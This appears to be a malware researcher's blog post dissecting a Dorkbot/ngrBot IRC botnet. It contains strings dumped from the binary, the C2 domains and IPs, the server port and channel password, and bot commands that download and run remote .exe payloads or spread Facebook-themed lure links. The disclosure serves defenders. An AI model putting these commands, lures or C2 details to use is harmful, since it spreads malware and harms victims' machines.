This botnet is very big one and the bot used for spreading is also special
alot of features inside like injection into multiple system processes,ruskill for killing processes blocking av updates , windows security updates, msn spread,ftp infection etc
Sample vas captured by Xylitol and then i helped for finding more ip’s and diferent samples from same botnet
The bot is detected as Dorkbot
Here we go
Analysis from sample:
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v=”%s” c=”%s” h=”%s” p=”%S”]
[d=”%s” s=”%d bytes”] Updated bot file “%S” – Download retries: %d
[d=”%s” s=”%d bytes”] Executed file “%S” – Download retries: %d
[Slowloris]: Starting flood on “%s” for %d minute(s)
[Slowloris]: Finished flood on “%s”
[UDP]: Starting flood on “%s:%d” for %d second(s)
[UDP]: Finished flood on “%s:%d”
[SYN]: Starting flood on “%s:%d” for %d second(s)
[SYN]: Finished flood on “%s:%d”
[USB]: Infected %s
[MSN]: Updated MSN spread message to “%s”
[MSN]: Updated MSN spread interval to “%s”
[HTTP]: Updated HTTP spread message to “%s”
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to “%s”
[Visit]: Visited “%s”
[DNS]: Blocked “%s”
[usb=”%d” msn=”%d” http=”%d” total=”%d”]
[ftp=”%d” pop=”%d” http=”%d” total=”%d”]
[RSOCK4]: Started rsock4 on “%s:%d”
[RSOCK4]: Stopped rsock4
[d=”%s” s=”%d bytes”] Update error: MD5 mismatch (%s != %s)
[d=”%s”] Error downloading file [e=”%d”]
[d=”%s”] Error writing download to “%S” [e=”%d”]
[d=”%s” s=”%d bytes”] Error creating process “%S” [e=”%d”]
[d=”%s” s=”%d bytes”] File “%S” has an invalid binary type. [type=”%d”]
[d=”%s”] Error getting temporary filename. [e=”%d”]
[d=’%s”] Error getting application data path [e=”%d”]
[Visit]: Error visitng “%s”
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: “%s”
[Ruskill]: Detected DNS: “%s”
[Ruskill]: Detected Reg: “%s”
[PDef+]: %s
[DNS]: Blocked DNS “%s”
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
dns
msn
httpspread
blk
http://api.wipmania.com/
.pipe%08x_ipc
heytherebitch.com
ngrBot
keshmoney.biz
ngrBot
smellypussy.info
ngrBot
#boss
ngrBot
bossman
Vmv
30e41aa1
FvLQ49IlzIyLjj6m
die
msn.set
msn.int
http.set
http.int
http.inj
Dns used for the botnet:
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]
How to conect to this server:
smellypussy.info:81
heytherebitch.com:81
keshmoney.biz:81
UPDATE:
Remote Host Port Number
204.15.252.199 49287 ircd here
208.75.230.43 80
213.251.170.52 80
61.31.99.67 4042 ircd here
Chanel:
Now talking in #boss
Topic On: [ #boss ] [ !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s ]
Topic By: [ b ] b for bullshit lol
NICK new[USA|XP|COMPUTERNAME]zvbnyex
USER hh “” “lol” :hh
JOIN #newbiz#
PONG 422
Chanel pass:ngrBot
The bin is for sell in underground forums for 400$ but u can have it for free now
UPDATE:
Resolved : [heytherebitch.com] To [216.131.127.13]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [heytherebitch.com] To [111.90.148.204]
Now talking in #boss
Topic On: [ #boss ] [ !mod pdef off !http.int 5 !http.set wow haha!! http://bit.ly/m9b3kv?=facebook-photo-06-29-2011-jpg !msn.int 5 !msn.set wow haha!! http://goo.gl/KCx6J?=facebook-photo-30-06-2011-jpg !mdns http://rapidshare.com/files/3786834417/avxd.txt !s !s -v !dl http://tinyurl.com/5s3kxcd -n ]
Topic By: [ b ]
(bb) !dl http://tinyurl.com/5s3kxcd -n